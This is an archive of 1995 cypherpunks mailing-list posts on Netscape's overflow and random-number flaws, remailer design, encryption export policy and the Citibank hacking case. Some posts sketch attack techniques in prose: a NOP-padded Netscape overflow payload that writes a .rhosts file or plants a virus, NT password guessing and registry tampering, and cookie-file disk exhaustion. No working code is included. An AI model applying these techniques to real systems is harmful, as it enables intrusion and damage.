>       Regarding Netscape, Mr. Dent of Microsoft said the
>       firm's security deficiencies that have recently come to
>       light have "tainted" electronic commerce on the
>       Internet. Mr. Dent also noted that Microsoft yesterday
>       introduced new security technology, including means to
>       verify a user's identity, that is much stronger than
>       Netscape's.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 27 Sep 95 02:21:27 PDT
To: Matthew.Sheppard@Comp.VUW.AC.NZ (Matthew James Sheppard)
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <199509260102.NAA09663@bats.comp.vuw.ac.nz>
Message-ID: <199509270920.FAA19713@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Matthew Sheppard writes:
> sameer writes:
> > 	He's -asking- for an exploit. Tshirts to Ray and the person who
> > does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> > have them do one.
> 
> It isn't simple, you need to know the absolute address of where the
> supplied code will be and alter the return address on the stack to
> that address.

> With Netscape 1.1 the state of the stack is much more dynamic, in
> particular the user can be viewing documents at an arbitary depth in
> the "web tree", each recursion will increase the stack pointer (or
> decrease with some architectures) There is no way of knowing for
> certain where you code will end up and thus no way to reliably alter
> the return address on the stack to execute your arbitary code.

   Are you sure that Netscape uses an implicit stack for this,
rather than an explicit stack? If they use an explicit stack for
the "web tree", than your argument doesn't apply. In fact, I guess
that they do use an explicit stack, because it makes implementing
the "History" menu which shows the last couple of links much easier.
I guess that they use some sort of "ring" structure which is
a dequeue or plain array, so that after a certain "depth", states
are written over and "scrolled off"

  Also, if they used an implicit stack, all it would do is increase
the uncertainty of where the stack pointer is. However, by
inserting enough NOPs into the exploit code, you can virtually insure
the exploit code will be executed. Even if you are off by 64kbytes,
you can insert 64kbytes of nops which isn't much. My own testing
doesn't bear out your theory. I rarely changed the position of the 
overflowed stack frame by more than 200 (after following 3 nested links
to my exploit link). I included 256-512 nops before my exploit code.


> You could always gamble on popular states, like when the first url
> fetched by the browser.  Also you could direct execution to any
> routine in the netscape binary (with unknown arguments) .  The most
> detrimental offhand would be deleting the bookmarks file (whoopee) And
> with Netscape 2 comming RSN I wouldn't waste too much time.

  How about creating a .rhosts file with your name in it?

  Or, on Windows machines, inserting a virus?

  If an exploit is possible, any exploit is probable, given that a clever
encoding of assembly instructions can be created for any code required.
 
-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 27 Sep 95 02:37:36 PDT
To: cypherpunks@toad.com
Subject: Re: getting netscape to support the remailers
In-Reply-To: <9509261805.AA22239@cs.umass.edu>
Message-ID: <199509270937.FAA20543@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


 
> sameer writes:
> > 	I think that in order to get netscape to support the remailers
> > the remailers will have to:
> > 
> > A) Support S/MIME
> > B) Have a documented protocol, MIME-related
> > 
> > 	Did Ray Cromwell do some work towards MIMEifiying the
> > remailers? My impression of his work back when he posted was that it
> > trusted the remailers too much, but perhaps my memory is flawed-- in
> > any case his work may be helpful towards developing a remailer
> > standard, which could then help get support incorporated into
> > MIME agents.

  Yes, a while ago I was working on this, but I dropped it as people
didn't seem interested. It was part of my whole "Remailer 2.0" proposal
(before mixmaster was written)

  I was studying ways to make it easier for mail readers to interact with
remailers, in particular, messages which were split, padded, packetized,
and sent along separate chains. All this without some kind of special 
client. I wanted to use the multipart/partial part of MIME to have
the pieces combined at the recipient end and decoded using an
application/remailer or application/pgp type. (this was also
before PEM was worked on) So I had a lot of work to do in standardizing
stuff. I started working on a remailer which combined those facets,
and also

1) a remailer network which had strong authentication between remailers
so that untrusted remailers could not get in the network (web of trust
for remailers)
2) my virtual handle idea
3) strict addressing for virtual handles on the remailer network
(e.g. set up an explicit chain to anonymous bob by mailing to
remailer1#remailer2#....#remailerN#anonymous_bob. Also, if you add
a '*' in the path, it means for the remailer to choose a random
remailer as the next in the chain)
4) padding, packetizing, delayed delivery, creating artificial traffic to 
   thwart traffic analysis
5) a built in keyserver and "list of active remailers" server. 
   The list of active remailers server would also contain flags
   for each remailer detailing what it supports and special
   flags like if the machine is multiuser, single, firewalled, offline (UUCP 
   connection only), etc. I wanted as standard, that every remailer
   could serve keys or atleast tell you what other remailers were active
6) socket connection for commanding the remailer so that you can bypass
   sendmail logging and get error/status on the message
7) direct SMTP delivery bypassing local sendmail logging



I wanted to use multipart MIME to allow remailers in a network
to be run from user accounts in such a way that they wouldn't accidently get
mail intended for the remailer and they wouldn't have to bear
responsibility for the mail sent (only the whole machine would, as it would
be delivered via SMTP direct, not sendmail, so no local logs)

Nevertheless, like many things, I completed about 60% of it and it got
put on the back burner never to emerge. Mixmaster came along and I 
figured there's no point continuing.

 
-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 27 Sep 95 03:20:22 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: cypherpunks press releases/contact list
In-Reply-To: <199509262341.TAA16602@frankenstein.piermont.com>
Message-ID: <Pine.SUN.3.91.950927061628.29121A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 26 Sep 1995, Perry E. Metzger wrote:

> Who gives a damn, anyway? Its not as though we have a "cypherpunks"
> reputation to uphold.

I don't know about that.  If you read the three WSJ stories on the 
Netscape holes, you find that "Cypherpunks" moves closer to the lead 
'graphs each time.  Soon we'll be the lead.

DCF

"It is to be hoped *not* in a story about major Fibbie crypto busts."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 27 Sep 95 05:13:44 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Netscape Stock Prices
In-Reply-To: <v02120d06ac8e4b588d84@[199.0.65.105]>
Message-ID: <9509271213.AA10200@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
 > >
 > >950809  75.000  53.750  55.500  3851.8
 > :
 > :
 > >950925  69.000  62.250  67.000  684.0     WSJ article re: overflow bug
 > 
 > Actually, Netscape is still the only game in town as far as Wall Street
 > goes.

And of course the fact that a bug in the software is Big News only
makes things better.  I never see any WSJ articles about *my* bugs.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 27 Sep 95 07:38:02 PDT
To: cypherpunks@toad.com
Subject: Using sound cards to accelerate RSA?
Message-ID: <Pine.SOL.3.91.950927072319.1340B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Somebody mentioned the possibility of using the a/d stage of a sound card 
as a source of random bits, and that brought a thought back to mind: 
given that a lot of sound cards are now shipping with DSP chips on board, 
has anyone written any code that uses the cards DSP to accelerate RSA 
processing? 

Maybe there's a mass market market for a crypto-blaster- an RNG, 3 or 6 
DES chips, and a DSP. It would make for a killer linux based SHTTP server...

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 27 Sep 95 04:52:01 PDT
To: cypherpunks@toad.com
Subject: HP KEscrew
Message-ID: <199509271151.HAA03534@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, Sept 27, 1995


   Hewlett Lobbies for Its Encryption Plan That Would
   Satisfy Tough Export Rules

   By Don Clark


   Hewlett-Packard Co. is pushing an unusual plan to
   protect electronic transactions around the world
   without running afoul of U.S. export laws.

   The Palo Alto, Calif., computer maker said it has been
   lobbying government agencies for more than a year to
   gain support for its proposal, which uses a
   data-scrambling technology to protect transactions
   from tampering or theft of data. Strong encryption
   technologies ordinarily fall under tough export rules
   that limit technologies which could impede U.S.
   wire-tapping capabilities, a source of continuing
   friction between the government and high-technology
   companies.

   H-P, in a plan developed with the French company
   Gemplus SCA, wants to split the code-making
   technologies into two pieces that would be approved
   under different government standards. One device,
   which could fit in a standard computer, would contain
   a basic encryption capability that is designed to be
   broadly exported without the need to seek a separate
   export license for each foreign user.

   Would Help Industry

   That device, dubbed an encryption engine, would be
   useless without the addition of another tiny piece of
   hardware that contains a code-making formula set at a
   specific strength. The second device, called a policy
   card, would be separately reviewed by the U.S. State
   Department for each customer.

   Government agencies, including codebreakers at the
   National Security Agency, would still have a say over
   the strength of encryption exports. But customers
   could build commercial applications around the
   proposed encryption engine, knowing that it will work
   with any code-making formula that governments might
   adopt in the future. Now they run the risk that their
   work will become obsolete amid policy changes in
   Washington, D.C., and other countries.

   State Department officials weren't immediately
   available for comment. Stewart Baker, a former NSA
   general counsel who now practices law in Washington,
   D.C., termed the H-P plan a clever answer to the
   problem of shifting government policy.

   "There was a lot of skepticism when H-P first proposed
   it," said Lynn McNulty, a former encryption specialist
   at the National Institute of Standards and Technology.
   "But it looks to me that they are well on the way to
   the next step."

   H-P Confident of Approval

   Doug McGowan, an H-P manager involved with the
   project, said he expects to receive U.S. approval by
   next year to begin shipping the encryption engine
   freely to Western Europe and Canada. "We believe we
   will receive relaxed export controls," he said.

   H-P's plan fits some of the NSA's objectives. For one
   thing, its technology embeds encryption technology in
   microchips that can't easily be modified by computer
   hackers or terrorists. H-P's policy cards also could
   be adapted for a controversial Clinton administration
   proposal called key escrow, in which mathematical keys
   to break codes could be stored for later use by law
   enforcement or intelligence agencies, Mr. McGowan
   said.

   The plan complements a parallel H-P effort to develop
   a new generation of "smart" data cards to let
   consumers buy goods and services around the world
   electronically. Gemplus, a huge supplier of credit and
   debit cards in Europe, is supplying technology to that
   effort along with Informix Corp., a database software
   maker in Menlo Park, Calif.

   Jeff Hudson, an Informix vice president, said the
   partners' proposed cards could store money and a
   database worth of personal information, such as
   medical records. That approach could eliminate the
   need to connect to multiple companies or agencies to
   manage such information, since it would be stored on
   each card, the companies said.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 27 Sep 95 05:03:00 PDT
To: cypherpunks@toad.com
Subject: SSTarget
Message-ID: <199509271202.IAA04464@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, Sept 27, 1995


   Microsoft and Visa Expected to Unveil Internet Technology

   By a WSJ Staff Reporter


   New York -- Microsoft Corp. and Visa International are
   expected to disclose details today of their technology for
   protecting commerce on the lnternet.

   The software company and bank clearinghouse have been
   working since last November on a plan for protecting
   creditcard numbers and other financial data from crooks, a
   major obstacle to the widespread use of computer networks
   for buying goods and services. As the largest players in
   software and credit cards, Microsoft and Visa wield
   considerable clout among a crowd of companies vying to set
   electronic-security standards.

   Their proposed specifications, calied Secure Transaction
   Technology, or STT, is partly based on a data-encryption
   technology popularized by RSA Data Security Inc., a closely
   held company in Redwood City, Calif.

   Other key players in the Internet-security race include
   MasterCard International Inc., the other name in bank
   cards, and Netscape Communications Corp., a leader in
   Internet software that has suffered some highly publicized
   security lapses lately. MasterCard announced plans to
   collaborate with Visa on security technology in June, but
   isn't expected to take part in the latest Visa-Microsoft
   announcement.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Wed, 27 Sep 95 05:18:34 PDT
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: Wild Idea for RNG
Message-ID: <199509271218.IAA07658@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


Warning: I'm no expert, my response is just a semi-informed opinion
(emphasis on "semi-").

At 02:19 1995.09.27 -0400, Ray Cromwell wrote:
>So, why not construct a turing machine with a large state transition
>table, input a random program, and get a 1 or 0 bit depending on
                ^^^^^^
>whether it halts in X number of cycles. You could even get more
>than 1 bit out of it by measuring how many cycles it takes to halt
>(if it halts before X) and use the LSB. Is it as secure as
>the halting problem? (intractable to devise an algorithm used
>to predict a bit with more than 50% confidence if you knew the
>state table?) 

Your randomness will depend on the prior randomness of your original
input... and if you already have that, the TM won't give you any additional
randomness (rather, this approach will just take all the randomness you give
it and reduce it to 1 bit of randomness, losing all the rest).

On the other hand, if the 'random' program is not already truly random, then
you may well have patterns in the bits generated by the halting observation.
For instance, if you use a known PRNG to get your "random" programs, then
given the same seed you will end up with the same programs (and therefore
the same resulting 'random' bits from the TM halting output)... which, in
other words, gains you nothing AFAICS over simply using the PRNG's output
directly, except of course that it exercises your CPU. :-)  The attacker
still only needs to figure out the seed.

>Grab a picture of the current bitmap on your screen. Run it through
>a good compression algorithm (say, an arithmetic/Q-coder or
>one of the LZ schemes). Grab the LSB of every 4th byte or so.
>If the screen is size 1024*768*8, that's 786432 bytes. Let's assume
>a 10 to 1 compression ratio = 78643 bytes. Let's assume you take
>1 bit from every 10 byte, that's 983 bits of entropy.
>
>The screen will often contain data like:
>
>random placement of icons and windows

Not on my machine (or most others, I'd wager)!  I thought about this, and
whenever I'm running Netscape (for instance) my screen is probably identical
over 50% of the time because I tend to have the same things open when I run
a given program.

Even in the general case, consider that most people have a preferred desktop
layout (in Windows, they have ProgMan sitting in one place on the screen
with usually the same groups visible/open)... not only will that piece of
the screen bitmap not give you any randomness from one run to the next, but
unless you go looking for "things that haven't changed since last time" your
program won't even know what's reducing your randomness.

>current time

Better, but be careful how you use it; that's what Netscape thought too. :-)

>current applications running, and the data in their windows
>
>
>If Netscape was running for instance, part of the random bits
>would come from the bitmap representation of the data in Netscape's
>window which would depend on the URL being displayed.

This sounds a bit better... except, of course, that when you initiate a
secure session in Netscape with a specific party/server, your screen has a
very good chance of looking the same each time you connect with that entity
because it is the same URL. :-)

Would someone who's more informed please correct my analysis?  Thanks in
advance,

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank A Stevenson <frank@funcom.no>
Date: Wed, 27 Sep 95 00:50:40 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: netscape NSRANDFILE compatible with /dev/random ?
In-Reply-To: <9509261428.ZM150@tofuhut>
Message-ID: <Pine.SGI.3.91.950927082835.1586B-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain



What happens if NSRANDFILE is set to /dev/random ?
will netscape try to read an infinite number of random bytes ?

> ...
> do it.  Instead of reading ~/.pgp/randseed.bin, we now get the name
> of a file from the environment variable NSRANDFILE, and pass that
> file's contents throught the RNG seed hash.  If you decide that its
> safe, you can set the env variable to point to your randseed.bin file,
> or any other file of random bits you care to use.
> ...
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

  Frank




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 27 Sep 95 05:35:34 PDT
To: cypherpunks@toad.com
Subject: FT on NsCPunxsters
Message-ID: <199509271235.IAA07479@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, Sept 27, 1995

   Cracks in the code

   Peter Martin calls for an easing of US restrictions on
   the export of encryption technology


   Encryption used to be a subject of interest only to spies
   and mathematicians. But the central role that the
   electronic transmission of information is playing in
   commerce and society make it now a technology of enormous
   practical relevance. Two recent stories out of many
   exemplify this trend.

   Citibank lost $400,000, it is alleged, to a Russian hacker
   who managed to crack its clients' passwords. The solution
   to this security problem: a new generation of encrypted
   passwords that are much harder to crack.

   And Netscape Navigator, the leading "browser" program for
   the Internet's fast-growing World Wide Web, has been shown
   to have flaws in its encryption routine. In theory at
   least, these make it possible for outsiders to read
   encrypted data sent over the net -- such as credit card
   numbers. Netscape acknowledges the problems and says it
   will have fixes available by today.

   Is this crucial technology vulnerable to determined attack
   by hackers and fraudsters?

   Before considering the question, remember that the
   introduction of any new technology highlights risks
   uncomplainingly borne for years. The safety precautions
   demanded of the Channel tunnel are one example, as compared
   with those required of traditional trains or ferries.

   Similarly, it is argued, people have been unhesitatingly
   using analogue mobile phones, reading credit card details
   over the telephone, and sending off faxes into the ether
   without any of the panic that now surrounds the issue of
   Internet security.

   The comparison is an instructive one, but not entirely
   fair. What worries Internet users is not so much that a
   determined enemy might target them for eavesdropping, or
   even that chance might put their credit card details in the
   hands of a dishonest person.

   Instead, they worry about the Internet's unstructured
   nature under which messages are passed from computer to
   computer across the world until they reach their final
   destination.

   In principle, this would allow a criminal to leave a
   "sniffer" program lurking, electronically, at one of the
   nodes, recognising credit card numbers as they passed by,
   and scooping them up for subsequent exploitation. People
   also fear an attack on the computers of merchants selling
   goods over the Internet -- each containing thousands of
   credit card numbers. The fear is thus not one of random
   theft but of systematic brigandage.

   Encryption is all that stops such fears paralysing
   electronic commerce before it has properly begun. It is
   therefore in the general public interest that effective
   encryption be widely available.

   The Netscape problem illustrates how easy it is for the
   inherent mathematical strengths of a modern encryption
   scheme to be overcome by an oversight in its supporting
   plumbing. One of the faults in Netscape's encryption, for
   example, stems from too predictable a method of generating
   the random numbers needed to make the scheme work.

   It also illustrates how, once a code-breaker's task is
   simplified by such a weakness, today's powerful networks of
   cheap computers make it quick to crack even the most
   sophisticated encryption schemes. The narrower the range of
   numbers through which the cracker's computers must sift in
   order to find a meaningful answer, the greater the
   probability of breaking the code within a useful amount of
   time.

   All the more reason, then, for non-Americans to view with
   dismay a US policy which restricts the international
   distribution of the most powerful forms of encryption. For
   national security reasons, the US insists that the version
   of Netscape sold outside North America must contain a
   weaker form of encryption than that available to Americans
   and Canadians.

   The international version is restricted to a 40-digit
   "key", while the North American version uses 128 digits.
   The longer the key, the greater the time and computing
   power required for the code to be cracked. In principle,
   given enough computing power, even a message encoded by a
   very long key could be cracked in time. In practice,
   however, the task of cracking many millions of messages to
   find one that is of interest makes messages secure as long
   as the key has enough digits.

   Amateur code-crackers claim to have broken the 40-digit
   version of the Netscape encryption scheme. Their claim is
   hard to verify. But there is no doubt of the weakness in
   the random-number generation procedure; Netscape has
   verified it.

   This fault is common to both North American and export
   versions of the program, so it does not result from the US
   government restrictions on key length. The occasion reminds
   us, however, that effective encryption is essential to the
   growth of electronic commerce. And it teaches us that
   simplifying the code-breaker's task -- by error in
   Netscape's case, by deliberate diktat in the case of the
   government restriction is an easy way to make transmissions
   vulnerable.

   There was never much justification for the US determination
   to weaken exported encryption products. There is less now.

   [End]

---------

   NYT, Sept 27, 1995

   Russians Arrest 6 In Computer Thefts

   St. Petersburg, Russia, Sept 26 (AP) -- Russian police
   officers have arrested six more people in a $10 million
   computer theft from Citibank here, but the masterminds are
   said to remain at large.

   An officer in the organized crime division was quoted by
   the Itar-Tass news agency as saying that six people had
   been arrested in St. Petersburg on swindling charges
   stemming from the case involving Citibank, the chief unit
   of Citicorp. Weapons and tax-evaslon charges may also be
   filed.

   The police confiscated two computers and a number of
   computer diskettes, plus weapons and cash from the
   suspects.

   Bank and law-enforcement officials say a gang of thieves in
   St. Petersburg broke into Citlbank's electronic
   cash-management system scores ot times and transferred
   money into their own accounts.

   Several people have been arrested abroad and face charges
   in the United States, including Vladimir Levin, 28,
   reportedly the group's computer hacker.

   Citibank officials said they recovered all but $400,000 and
   upgraded the cash-management systems's electronic security
   after the theft.

   [End]

---------

   FT, Sept 21, 1995.

   Extradition in Citibank hacking case

   A British court yesterday approved the extradition to the
   US of Mr Vladimir Levin, the Russian science graduate
   accused of an attempted $10m (6.5m pounds) computer hacking
   fraud on Citibank. ...

   Mr Levin has been charged in the UK with offences under the
   Computer Misuse Act, forgery and false accounting. The US
   authorities are now drawing up similar charges to bring
   against him.

   Mr Levin is one of six people arrested over the alleged
   attempted fraud on Citibank. An FBI inquiry into the
   incident is continuing and it is believed that others are
   still being sought.

   When Mr Levin is returned to the US, he is likely to be
   closely questioned by the authorities, who are anxious to
   discover more of the technical details of the alleged
   attempted fraud.

   Mr Levin, who was arrested earlier this year travelling
   through Stansted airport in the UK, would appeal against
   the court's decision, his lawyers said. He has 14 days to
   lodge an appeal to the High Court in London. ...
   
   [End]











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 27 Sep 95 09:04:10 PDT
To: RJ Harvey <rjc@clark.net
Subject: Re: Hack Microsoft?
Message-ID: <199509271603.JAA23248@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



At 10:33 AM 9/26/95 EDT, Dan Bailey wrote:

>>For fun ways to hack NT, check out http://www.somar.com/security.html.
>> Some of these are really laughable.  You can use NT's LogonUser API
>>call to repeatedly guess passwords until you hit it, since NT offers
>>no way to limit number of login attempts.

At 12:10 PM 9/26/95 -0400, RJ Harvey wrote:
>   I don't believe that's correct; under User Manager, select
>the Account option under the Policies menu item; it lets you
>select whether to lock-out the account after a given number
>of invalid logon attempts, and to set the number.  The main
>problem here is that by default, I don't believe the 'lock out'
>option is enabled

Similarly there is an awful lot of other stuff that is left wide
open by default, most notably important parts of the registry, in particular
\HKEY_LOCAL_MACHINE\SOFTWARE 

Permissions on this are usually set to give every use write access, so that
every user can install software.  None of the installation programs
reset their registry key to exclude write access by anyone other than
the administrator or the person installing the program, as a result any
user can muck with the environment of any program installed by any other user.

As a result any user can force feed most programs strings which the 
program would ordinarily assume are internally generated, and can therefore
be trusted.  A low privilege user can muck with the internals of a program
installed by a high privilege user.

This of course is a bug in the installation programs, rather than a bug 
in the operating system, but it is an almost universal bug.

(But before you Unix folk gloat, consider how few Unix programs *have*
installation programs, also that Unix has no registry security problem
because it has no registry.)

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 27 Sep 95 06:25:00 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <ac8d7d09040210041c62@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950927091535.28140B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Sep 1995, Timothy C. May wrote:

> At 6:52 PM 9/25/95, Jon Lasser wrote:
> 
> >Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
> >a student like myself, and probably most others, if it's still anything
> >like it was at the 1.0 release) that mostpeople have had zero opportunity
> >to examine the program, let alone really have time to play with it?
> 
> I've never even _seen_ a copy of Notes running on any machine, nor do I
> know directly of _any_ of my colleagues who has. (Not saying nobody has, of
> course, just that I can't find anyone I know well who has.)

I've seen Notes running -- the Major-name discount software chain I used 
to work for (peon level) used it for communications.  It was slow and 
frustrating, but my access to it was only marginal... I certainly hadn't 
a chance to examine the code with a debugger, or even just play with it 
some.  But, knowing the software, it wouldn't surprise me if there were 
some serious bugs in the security code.

> My point? Notes is nearly invisible in the non-corporate community I now
> hang out in.
> 
> Who knows what weaknesses or bugs it has in it. Folks on our list probably
> don't have much familiarity with it.

Exactly... I think the product is guilty of security through obscurity, 
though I'm not sure it's particularly intended, just merely an artifact 
of the marketing strategy...

> My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM
> overpaid for Lotus, that the notion of Notes becoming the universal
> collaboration/communication option is flawed.

Agreed.  OTOH, before the Web was known, it made a lot of sense for 
corporations...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Wed, 27 Sep 95 06:32:06 PDT
To: cypherpunks@toad.com
Subject: Hegel
Message-ID: <950927093027.2000cf@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




James Caldwell wrote:

>On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote:
>It's called the Hegelian Diclectic(sp?) first postulated by William
>Hegel (an ass) in Germany approx the 1600's as a method for social change
>when none could otherwise be achieved.

  Just for a reality check, Georg Wilhelm Hegel (1770-1831), was not an ass, 
  but rather a brilliant philospher, even if you do like his views. I am 
  guessing you are refering to his "dialectic", which was simply an observation 
  of the way history worked:  Thesis <---> Antithesis
                                       |
                                   Synthesis

   The synthesis then becomes the new thesis and history moves. It was not
   proposed as a method of social change, but rather a description of how
   history moves. It is always better to some of idea of what you are talking
   about before you make such rash, critical statements. 

   Sorry for the noise to the list.

                              Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 27 Sep 95 06:36:36 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: [NOISE] Re: Easter Eggs
In-Reply-To: <199509261959.MAA28501@desiree.teleport.com>
Message-ID: <9509271335.AA26916@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 26 Sep 1995 12:59:54 -0700
    From: Alan Olsen <alano@teleport.com>
    
    You also need X windows to find the Mozilla animated icon hack on
    Jammie Zawinski's page.
    ^^^^^^

Just for the record, that's Jamie.

    obNetscapeHack: There is a feature called a "cookie file" in
    Netscape that is ripe for exploitation as a security leak.  If you
    are using a Netscape server (and you may not even need that), you
    can feed all sorts of information into it without the user's
    knowlege.  I have heard of one page that overloads the cookie file
    until the machine runs out of drive space.  I am sure that there
    are other exploitable holes there...  Any takers?

Yikes!  That sounds really bad.  Do you have any more information on
this?  For example, can the server write to anything other than
$HOME/.netscape-cookies?  If I write protect that file, but it's still
owned by me, will Netscape still modify it?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 27 Sep 95 07:00:11 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Security Update news release
In-Reply-To: <9509261733.AA22080@cantina.verity.com>
Message-ID: <199509271402.KAA23709@homeport.org>
MIME-Version: 1.0
Content-Type: text


| > >  Here is the press release we put out this morning regarding the fix
| > >for RNG seed and stack overflow problems.
| > 
| > Do the new versions use PGP's randseed.bin? If Netscape even only looks at
| > data used to keep PGP secure,  Netscape will be banned from my computer
| > and every computer I am responsible for. -- For good.
| 
| That doesn't quite make sense.  Netscape reading randseed.bin can have no
| effect on the security of PGP.

	I think you meant to say:

	"If md5 is a solid hash fucntion, and if Netscape doesn't dump
core somewhere publically readable, and if Netscape doesn't
accidentally have a stack overflow that causes your randseed,bin to
become confused with last-url-visited, then it is very unlikely that
Netscape reading your randseed.bin will have an effect on the security
of your PGP keys or messages."

	The history of people doing the impossible is too long to not
spell out your security assumptions.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 27 Sep 95 02:15:13 PDT
To: David_A Wagner <daw@cs.berkeley.edu>
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509252031.NAA15134@quito.CS.Berkeley.EDU>
Message-ID: <199509270913.KAA17943@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| > Giving out contribution: 
| >      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
| > Taking in contribution : 
| >      my_seed = my_seed XOR 
| >      ((select_low_bits(remote_contrib, contrib_width) << contrib_area)
| > 
| 
| People seem to think this kind of thing is obviously safe.  I'm not yet
| convinced.

Well, I'm not either, actually. But I think this might be better
than the current state of affairs, where every bit of your seed
is almost guessable. And it might also be an intermediate solution
until there is a good random seed hardware generator in every computer.

| By xoring in a quantity *chosen by your adversary*, you're essentially
| allowing related-key attacks on your stream cipher.  (Your PRNG is just
| a stream cipher, keyed with my_seed.)

I think you mustn't allow the any external partner to "contribute" at a
known and/or chosen offset into the buffer. You mustn't either accept 
"too much" contribution.

| Noone knows how secure most ciphers are against related-key attacks:
| related-key attacks are known to be very powerful (often more powerful
| than any other type); but very little research on this topic is available.
| You're treading on unknown ground.

Yes. But I wonder whether this isn't really about the battle between
"the pragmatists" vs "the purists" point of view wrt security? I see so
many very unsophisticated attacks out there that a related-key attack,
although possible and powerful, still is rather unlikely.

Could you quantify how powerful a related-key attack is, compared to
some other kind of attack? I don't know anything about this kind of 
attack, do you have any references?

| There's the also a small error in your specific algorithm.  Let
| 	 n = stop_bit - start_bit;
| presumably n is much less than the length of your seed.  Then a brute-force
| search over n bits will recover n bits of the seed -- this is a much faster
| cryptanalysis than a brute force over all bits of the seed.  This can
| probably be fixed by something like
| 	MD5(select_bits(MD5(my_seed))) -> remote,
| but the related-key uncertainties still remain.

